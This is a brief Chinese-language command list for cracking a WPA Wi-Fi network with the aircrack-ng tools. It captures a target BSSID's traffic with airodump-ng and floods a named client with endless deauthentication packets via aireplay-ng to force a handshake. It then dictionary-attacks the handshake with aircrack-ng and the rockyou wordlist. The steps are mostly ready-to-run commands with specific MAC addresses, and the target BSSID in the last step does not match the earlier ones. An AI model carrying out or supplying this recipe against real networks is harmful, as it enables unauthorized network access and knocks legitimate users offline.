1.ifconfig

2.airodump-ng i 查看無線信息

3.airodump-ng -w * -c 1 --bssid D8:24:BD:2F:C5:50 wlan0

用 wlan0 這個無線設(shè)備來抓取 bssid為 D8:24:BD:2F:C5:50，在Channel(頻道1)上的WiFi的包，并保持在本地home文件夾下，保持的包名稱為：*

4.aireplay-ng -0 0 -a D8:24:BD:2F:C5:50 wlan0 -c B8:E8:56:09:CC:9C wlan0mon

為了加速握手包的獲取，我們可以使用aireplay來給AP發(fā)送斷開包(強(qiáng)制連接到wifi的設(shè)備重新連接路由器), -0為模式中的一種：沖突攻擊模式，后面跟發(fā)送次數(shù)（設(shè)置為0，則為循環(huán)攻擊，不停的斷開連接，客戶端無法正常上網(wǎng)，-a 指定無線AP的mac地址，即為該無線網(wǎng)的bssid值,wlan0 你的無線設(shè)備,-c 指定斷開的設(shè)備

5.aircrack-ng握手包-w字典 aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap